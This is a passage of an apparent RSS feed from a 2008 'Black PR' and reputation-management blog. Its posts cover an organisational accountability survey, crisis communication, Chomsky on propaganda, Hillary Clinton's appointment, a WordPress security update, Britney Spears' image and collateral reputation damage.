         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/xjy/51519638/"><img class="initial-capital" src="http://farm1.static.flickr.com/29/51519638_6b899a7d1c_m.jpg?v=0" alt="051003 storting crown prince's crown"/></a><p>The beauty award this year goes to the <a rel="nofollow" target="_blank" href="http://www.ifoam.org/">International Federation of Organic Agriculture Movements (IFOAM)</a>, followed by the <a rel="nofollow" target="_blank" href="http://www.ebrd.com/">European Bank of Reconstruction and Development</a> and <a rel="nofollow" target="_blank" href="http://www.unicef.org.uk/">Unicef</a>. The lowest reputation scores, however, were received by International Olympic Committee and NATO. Not surprising at all ! You should not expect that military and sport organizations would have been ranked higher than that, especially when their image is closely related to the general image of the services they offer and the image the places where their headquartered are based. Being accountable is also a tough task for most corporations as they fail to deploy effective policies and active management systems.</p> <p><strong>The Contest:</strong> According to the latest survey of <a rel="nofollow" target="_blank" href="http://www.oneworldtrust.org/">One World Trust</a> (a British Think Tank), the IFOAM, along with 29 other powerful organizations, have been assessed in terms of their accountability to stakeholders and wider public. The scope of the research was based on the assessment of four major criteria such as transparency, participation with outsiders, evaluation and complains handling. Turns out that none of the companies actually managed to score higher than 70 percent accountability which is very low and insufficient result. The official report also states:</p> <blockquote>A score of 70 percent indicates that an organisation has policies in place that meet only some good practice principles and the basic management systems to support their implementation. This is the floor, not the ceiling, of accountability capabilities. If global organisations are to be part of the solution to global challenges, there needs to be a step change in their approaches to accountability. They need to start implementing the more challenging accountability reforms which truly empower external stakeholders to hold an organisation to account. Organisations must also take the necessary steps to embed accountability in their culture and ensure it is being translated into practice.</blockquote> <p>The other interesting conclusion that has been made is that all of the evaluated companies failed to show good scores (more than 50 percent) in their transparency policies and complaint handling procedures. It is funny that <a rel="nofollow" target="_blank" href="http://www.transparency.org/">Transparency International</a> (a global organization that tries to fight corruption) takes one of the lowest positions in this chart. Why is this so important? Well, from a Black PR perspective, these are pretty severe vulnerabilities. If an attacker manage to hack into the corporate complaint tracking software and steals all of the important data, he can easily turn that into a massive negative campaign. The affected organization will be not only caught into a very awkward situation, but it will be unable to respond properly to the increasing flow of stakeholders complaints. This also leads to intense media attention and general public dissatisfaction.</p> <p>One more thing &#8211; I did a little research on my own and I found out that the Google Page Ranks of the less accountable organizations is way higher than the the Page Rank of the organizations on the top of the list. However, if you type their name and the word <q>reputation</q> into the search box, you will find that the first couple of pages are filled with negative publications and comments . I guess popularity is not always proportionally related to the general stakeholders&#8217; respect.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Crisis Communication Is Like …Surfing</title>
         <link>http://www.spinhunters.org/blog/crisis-communication-is-like-surfing/</link>
         <description>I don&amp;#8217;t know about you but today I have started writing my New Year&amp;#8217;s Resolution List. One of the things I am eager to do next year is to learn how to surf. It&amp;#8217;s cool, risky and very challenging. What I like most about it is the sense of uncertainty and the way you need to survive with a minimum set of resources. Surfin is like crisis management, don&amp;#8217;t you think? [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=169</guid>
         <pubDate>Wed, 10 Dec 2008 11:57:31 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/hell_silva/964565773/"><img class="initial-capital" src="http://farm2.static.flickr.com/1430/964565773_44fcb87572_m.jpg?v=0" alt="too much surf in your head?"/></a><p>I don&#8217;t know about you but today I have started writing my New Year&#8217;s Resolution List. One of the things I am eager to do next year is to learn how to surf. It&#8217;s cool, risky and very challenging. What I like most about it is the sense of uncertainty and the way you need to survive with a minimum set of resources.</p> <p>Surfin is like crisis management, don&#8217;t you think? If you actually compare some of the basic tutorials in both disciplines, you will probably find a lots of similarities. So, once you master the ability to stay upright on the board, you can easily gain a confidence for dealing with some of the most severe crisis in the corporate world.</p> <h3>How to Start</h3> <p>When a crisis occurs, the first thing to consider is finding the balance point. Use your company&#8217;s strengths and all those positive qualities that cannot be doubted by the others. This will help you to balance out all the negative publications and unfair accusations. For example, if your organization is being socially responsible and undertakes many charitable events, this actually can help to save your stakeholders&#8217; trust and turn the crisis into unexpected corporate profit.</p> <p>The second crucial habit that must be developed is the ability to respond as quickly as possible to the changing environment. The speed is absolutely everything for both surfing and crisis management. It gives you not only a competitive edge, but also the power to predict every negative outcomes. At the same time, do not forget to keep it low once you get the situation back in control. In almost every zoology book it is stated that the most dangerous moments for the target is right after its escape form the predator. So if you keep looking at your feet, you will definitely fall down again. Instead, you should &#8220;cover the back of your head&#8221; and protect all your vital assets from further damages. Stay &#8220;under the water&#8221; as long as you can, but never lose the honesty in your conversations.</p> <p>Safety should always be in the back of your mind, which is a reason why you should never be surfing alone. You never know what might go wrong even on the smallest of waves &#8211; its good to have someone who can help you out if you get into trouble.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Back In The Classroom: Noam Chomsky on Corporate Propaganda Techniques</title>
         <link>http://www.spinhunters.org/blog/back-in-the-classroom-noam-chomsky-on-corporate-propaganda-techniques/</link>
         <description>I just stumbled across an old video on YouTube and I think it is worth sharing. The video is about the origin of the Public Relations industry in the US and why the modern democratic societies need to be manipulated. As it turns out, the free public mind is one of the greatest threats to many corporations and political regimes as it could easily destroy their long-term goals, ideologies and operations. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=158</guid>
         <pubDate>Fri, 05 Dec 2008 12:03:59 -0800</pubDate>
         <content:encoded><![CDATA[<p>I just stumbled across an old video on YouTube and I think it is worth sharing. The video is about the origin of the Public Relations industry in the US and why the modern democratic societies need to be manipulated.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/a4K2uBI61z4&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" width="425" height="344"></iframe></div> <p>As it turns out, the free public mind is one of the greatest threats to many corporations and political regimes as it could easily destroy their long-term goals, ideologies and operations. Chomsky also says that the idea of democracy gives an enormous, anarchic power to the regular people, which could be quite harmful to the society in general. Actually, propaganda is one of the Chomsky&#8217;s favorite topics as he wrote many books about it &#8211; <em>Media Control: The Spectacular Achievements of Propaganda</em>, <em>Manufacturing Consent: The Political Economy of the Mass Media and Propaganda</em> and <em>The Public Mind: Conversations with Noam Chomsky</em>. Great reads for those who are interested.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>A Note For Hillary: Stop Tarnishing The Democratic Values</title>
         <link>http://www.spinhunters.org/blog/a-note-for-hillary-stop-tarnishing-the-democratic-values/</link>
         <description>It is official! Hillary Clinton is finally appointed as the new Secretary of State. Congrats!!!! Let me tell you, this lady is everything, but a loser and will do everything just to get to the power of the state. It seems like she is absolutely capable of taking every political position you can think about of &amp;#8211; a first lady, a senator, a president wanna-be, a vice president and if all this fail why not a head of international affairs. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=148</guid>
         <pubDate>Wed, 03 Dec 2008 14:41:08 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/saz/34630357/"><img class="initial-capital" src="http://farm1.static.flickr.com/21/34630357_a5b1c00f5d_m.jpg?v=0" alt="note"/></a><p>It is official! Hillary Clinton is finally appointed as the new Secretary of State. Congrats!!!! Let me tell you, this lady is everything, but a loser and will do everything just to get to the power of the state. It seems like she is absolutely capable of taking every political position you can think about of &#8211; a first lady, a senator, a president wanna-be, a vice president and if all this fail why not a head of international affairs. There is nothing wrong with this, except that the recent political history is entirely dominated by families like the Bushes and the Clintons. Looks like once you taste the power of the White House, it is not easy to give it up. I cannot help but wonder, where is the real change that we are awaiting for so long?</p> <p>Funny enough, just few weeks ago both Hillary Clinton and Barack Obama said that they want to improve America&#8217;s standing in the world. The Democart&#8217;s victory was easily labeled by different media outlets as &#8220;historic&#8221; and has put hopes for a brighter future not only in US, but also in the whole world itself. Barack Obama is not just the first black president; he is a symbol of new political standards, a chance of economic survival and a representative of new class of world leaders. For a first time in many years (maybe after Nelson Mandela&#8217;s jail release), people all over the world were united in something bigger than their own social troubles. They were proud of the choice they made and were actually interested in following the news, counting the votes and somehow been personally involved in the whole competition.</p> <h3>What happened?</h3> <p>Let me take you back to the time when Hillary Clinton tried to &#8220;nominate&#8221; herself as a potential candidate for vice-presidency. Every rational political analyst at that time fiercely criticized the opportunity of pairing the &#8220;two former rivals&#8221; into the same election list. Moreover, it was said to be an absolutely wrong move and a second chance for Bill Clinton to overshadow the upcoming cabinet. Hillary was also seen as an obstacle that could put many prospective voters off the Obama&#8217;s political platform. Not to mention about the numerous dirty tricks that both candidates used to play to each other. Actually the fight between them was even more bitter and more aggressive than the one with the Republicans.</p> <p>Today, after the election, the partnership between Obama and Clinton has been suddenly seen as logical conclusion of a long, exhausting race. However there are still a couple of issues that must be considered. Hillary is not the type of a woman that will be easily controlled. No matter how suitable or experienced she is for being a Secretary of State, she also has a wide network of business/political connections which could put her into a great dominance over the rest of the crew. This means that her political leverage will be getting stronger and stronger each day, which kind of makes this team ineffective at its very beginning.</p> <h3>Bottom Line:</h3> <p>One of the good things about Democracy is the idea of free choice. The American people were actually unable to vote about the alliance between Hillary and Obama (as it would happen if she was officially named his running mate). Now they are forced to accept it. All this raises the question if we ever had the opportunity to choose between different democratic alternatives or everything was already set up as part of a nasty, political scenario. No matter how good it sounds in theory, the change has been already made, unfortunately not by us.</p> <p><em>Definitely not a good sign for the American reputation!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Wordpress Upgrades to 2.6.5</title>
         <link>http://blog.blogsecurify.com/2008/11/wordpress-upgrades-to-265.html</link>
         <description>A reminder to all you Wordpress users...make sure you update to version 2.6.5. From the &lt;a rel="nofollow" target="_blank" href="http://wordpress.org/development/2008/11/wordpress-265/"&gt;Wordpress Blog&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;"The security issue is an XSS exploit discovered by Jeremias Reith that fortunately only affects IP-based virtual servers running on Apache 2.x. If you are interested only in the security fix, copy &lt;code&gt;wp-includes/feed.php&lt;/code&gt; and &lt;code&gt;wp-includes/version.php&lt;/code&gt; from the 2.6.5 release package. 2.6.5 contains three other small fixes in addition to the XSS fix. The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests.&lt;br /&gt;&lt;br /&gt;...note that we are skipping version 2.6.4 and jumping from 2.6.3 to 2.6.5 to avoid confusion with a fake 2.6.4 release that made the rounds. There is not and never will be a version 2.6.4."&lt;/blockquote&gt;If you get something that tells you to install 2.6.4...don't do it! :-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-8859265458083182911?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-8859265458083182911</guid>
         <pubDate>Sat, 29 Nov 2008 21:42:00 -0800</pubDate>
      </item>
      <item>
         <title>“Big”, “Small” and “Fat” Reputations (The Healthy Edition)</title>
         <link>http://www.spinhunters.org/blog/big-small-and-fat-reputations-the-healthy-edition/</link>
         <description>In the mood of the upcoming Christmas feasts, here are our tips of how to stay corporate fit during the season. As you know, during this time of the year most companies are quite busy with the execution of various sales campaigns or are rushing to close important deals right before New Year&amp;#8217;s Eve. Christmas also means lots of parties, reunions and gatherings. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=142</guid>
         <pubDate>Thu, 27 Nov 2008 11:36:47 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/roadsidepictures/182061567/"><img class="initial-capital" src="http://farm1.static.flickr.com/75/182061567_ce2f71d499_m.jpg?v=0" alt="Fat"/></a><p>In the mood of the upcoming Christmas feasts, here are our tips of how to stay <q>corporate</q> fit during the season. As you know, during this time of the year most companies are quite busy with the execution of various sales campaigns or are rushing to close important deals right before New Year&#8217;s Eve. Christmas also means lots of parties, reunions and gatherings. However that urge for having a fresh start sometimes cost millions to the organizations as they tend to neglect their competitors and therefore easily become victims of lethal reputation attacks. While many attribute the cause for this as an excessive preoccupation during the holidays, much of the Black PR cases are due to the carelessness of managers to assess security threats and their actual frequency. CEOs also foolishly underestimate the objectives of negative campaigning and refuse to believe that someone will ever dare to affect their <q>flawless</q> corporate systems.</p> <p>I don&#8217;t think is even worth mentioning it here how idiotic approach this is and to be honest many organizations deserve their own reputation misery. So instead of spending quality time with friends and families, many employees end up the year setting crisis teams and fighting bad publicity. Sounds like lots of fun, isn&#8217;t it?</p> <h3>What is the healthy diet?</h3> <p>First of all, I think it is very important for corporations to understand the power of a good reputation. Although it is not something that you can touch and hold in your hands, having a good name (personal or a brand) is the only thing that matters at the end of the day. It affects not only your annual financial reports, but also it gives you a competitive edge and a whole new meaning of your marketing strategies, internal relations and in general sales performance. Companies with strong reputation are more likely to recover from severe crises, than the ones with inconstant behavior and negative image.</p> <p>Secondly, there is a common misunderstanding which I want to clarify. Usually when PRs talk about reputation, they tend to refer to it as good or bad one. The truth is that the reputation of an organization can be much more colorful as it can take many different shapes or sizes. Keep also in mind that the corporate image means different things for the different stakeholder groups, such as employees, suppliers, shareholders and the media. It is vitally important to keep the balance between them as you risk to put yourself in a very untrustworthy position.</p> <h3>The size always matters</h3> <p>There is no big or small reputation. It is all relative. Companies with <q>big</q> reputations are those with a greater popularity among the general public. This s the case with <a rel="nofollow" target="_blank" href="http://www.thebodyshop.co.uk/">Body Shop.</a> Everyone think of Body Shop as a company that is deeply concerned with the environment, fair trading and biologically clean products. This is something that nobody doubts or dare to counter.</p> <p>Organizations with <q>small</q> reputations are those that fail to established any strong images in the minds of the audience. Usually those are start-ups or corporations with controversial past and lack of political protections. Even worse &#8211; firms with no individuality and international media presence.</p> <p>The question here is what will happen when these two types of reputation collide. Obviously it will be much easier for a bigger organization to smash down the smaller one. It has wider network of connections, more money and better PR team. The smaller competitor won&#8217;t even noticed that they are being a victim of Black PR campaign or even if they do, nobody will believe them or even want to invest in an entity without any market future.</p> <p>However if a start-up succeeds in the defamation of a bigger company, it will automatically position itself as better consumer alternative and even secure its own market place. This opportunity is especially seductive for the retail industry. The only difficult thing here is the creating of an effective Black PR strategy and a new marketing plan for after that.</p> <p><em>So, take the tape measure and prepare for the upcoming festivals!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Britney Spears And The Art of Self-defamation</title>
         <link>http://www.spinhunters.org/blog/britney-spears-and-the-art-of-self-defamation/</link>
         <description>There is a new documentary coming up this weekend on MTV about Britney Spears. It is called Britney: For the Record and it aims to rebuild her reputation after months of a total meltdown. It is expected to be a heart-breaking story about her emotional collapse and the way she completely lost her way to the top. Funny enough, MTV was blamed a year ago that it deliberately helped destroying her image by letting her on stage of the MTV Music Awards 2007. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=134</guid>
         <pubDate>Fri, 21 Nov 2008 12:33:15 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/disier/352614978/"><img class="initial-capital" src="http://farm1.static.flickr.com/139/352614978_801cc5b7dd_m.jpg?v=0" alt="Britney Spears"/></a><p>There is a new documentary coming up this weekend on MTV about Britney Spears. It is called <q><a rel="nofollow" target="_blank" href="http://uk.youtube.com/watch?v=XF64RI6R2h4&#038;feature=related">Britney: For the Record</a></q> and it aims to rebuild her reputation after months of a total meltdown. It is expected to be a heart-breaking story about her emotional collapse and the way she completely lost <q>her way</q> to the top. Funny enough, MTV was blamed a year ago that it deliberately helped destroying her image by letting her on stage of the MTV Music Awards 2007. If you remember well she was brutally criticized by the tabloids at that time for her poor performance and horrible look, which put Spears even into a deeper depression. Britney easily became a synonym of psychological disorder and a topic of numerous humorous plots. For more then a year people all over the world were literally shocked by her tabloid-chronicled personal spiral that has included rumors of drug and alcohol abuse, a scalp-shearing breakdown, a few trips through rehab, visits from the department of child welfare, and a lot of genital exposure.</p> <h3>What is happening now?</h3> <p>For the last couple of months, the falling POP-star suddenly raised from the ashes. It was not something that I expected to occur so soon, at least not with the same magnitude. Today, Britney Spears looks like an entirely different person. She behaves well, spends quality time with her two sons, hits the top charts with a brand new single and even won two MTV awards. Larry Rudolph, her manager, kindly refers to as <q>the official beginning of the comeback</q>. However I couldn&#8217;t help but wonder, is it really a comeback or a well-designed reputation strategy?</p> <p>There are a few disturbing things which make me reason that Britney Spears&#8217;s brake-down could be part of a complex, self-created Black PR campaign. I know this sounds insane! Who could possibly do this to himself, but if you think about it &#8211; Why NOT???</p> <p>First of all, Britney released her fifth album, <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Blackout_(Britney_Spears_album)">Blackout</a>, right in the peak of her emotional troubles. Ask any reputation advisor and he will tell you that this is a wrong move, especially when you carry such a horrible media karma. That is completely true, but not if your singles are all about depression, self-lost and bad decisions. What would be a better way to promote your label, but your own self-destructing life. Keep also in mind that the target audience of the album is mainly composed of teenagers and I don&#8217;t even want to start discussing the emotional problems this particular group have to go through. What I am trying to say is that, Britney&#8217; life may be seen from some as a total wreck, but for others (young troubled girls) it is empathy, etc.</p> <p>On the other hand, people love to see their idols falling down. They want to assure themselves that the celebrities are just regular people as everyone else and have the same domestic and professional problems. This is how I can personally explain the whole hysteria around reality programs and <q>behind the scenes</q> features.</p> <p>Believe me, Britney Spears&#8217; record company knew this extremely well and as a result Blackout set the record for the biggest-selling digital album debut by a female artist in a week.</p> <h3>New Album requires a New Image</h3> <p>The next album of Britney Spears, <q>Circus</q>, is set to be released on 2th Dec (her birthday). The date it is not accidental. It should mark her comeback and new personal stage of life. She will be portrayed as more mature and emotionally stronger woman and she will probably start aiming at different type of audience.</p> <p>Britney already looks different. She has better style, better figure, boosted self-esteem and professional attitude. She seems quite <q>womanized</q> and in peace with herself. All she needs to do now is to start excusing herself and her recent behavior. She is aiming at people&#8217;s compassion and fortunately for her, we all like to forgive.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Collateral Reputation Damage</title>
         <link>http://www.spinhunters.org/blog/collateral-reputation-damage/</link>
         <description>There is a new reputation term I stumbled across yesterday (via Authenticorganizations blog) so I thought it is worth discussing it. It is called collateral reputation damage and the idea behind it is that some companies could be incidentally defamed, just by having random similarities with another, less respectable organizations or individuals. According to the author: How does it work? [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=126</guid>
         <pubDate>Wed, 19 Nov 2008 15:09:42 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/freeparking/1229303016/"><img class="initial-capital" src="http://farm2.static.flickr.com/1351/1229303016_6ffc0dda00_m.jpg?v=0" alt="vintage damaged class photo: me in the 1970s"/></a><p>There is a new reputation term I stumbled across yesterday (<a rel="nofollow" target="_blank" href="http://authenticorganizations.com/harquail/2008/11/17/what-is-collateral-reputation-damage/">via Authenticorganizations blog</a>) so I thought it is worth discussing it. It is called <q>collateral reputation damage</q> and the idea behind it is that some companies could be incidentally defamed, just by having random similarities with another, less respectable organizations or individuals. According to the author:</p> <blockquote><q>The collateral damage, (is) not intentional damage, because the folks taking action don&#8217;t intend to damage the organization�s reputation. Instead, the damage occurs through</q> guilt by association</blockquote> <h3>How does it work?</h3> <p>The most popular example of <q>collateral damage</q> is when two similar names (let&#8217;s refer to them as A and B) are being negatively associated with each other. Usually there is no any relevant connection between them, except their names, nicknames, corporate symbols or initials. Visual resemblance is also possible. The only requirement here is one of the subjects (let&#8217;s say A) to have an established bad reputation in people&#8217;s minds. So, every time when people hear about the other one, B, they will subconsciously associate it with the negative qualities and characteristics of A. Fortunately, this works only for a very short period of time. However, it could be really damaging only if A is in the middle of a corporate/personal scandal.</p> <p>This is what happened with <a rel="nofollow" target="_blank" href="http://www.seriouseats.com/2008/09/palin-syrah-sarah-sara-wine-drops-in-sales.html">Sarah Pailn and the Chiliean wine <q>Palin Syrah</q></a>. According to Chris Tavelli (a wine bar owner), <q>Palin Sayrah</q> was one of the best selling wines in his pub before her nomination as a Republican V.P. People were constantly put off of its low price and <strong>questionable</strong> quality.</p> <h3>How the affected party should react?</h3> <p>Well, there is no a straightforward answer really. Everything depends on the specific situation and whether the affected organization is willing to take any further steps to rebuild its reputation. The main point here is the harmed company or the individual must distant itself from the one with a bad image and make sure to demonstrate different corporate values. If the company publicly complains about its reputation loss and provide enough evidences about it, such as significant financial drops, then it has the real chance to increase its popularity, find new markets or even entirely re-position itself. As I always say, it all depends on the abilities of finding an opportunity in the crisis.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" 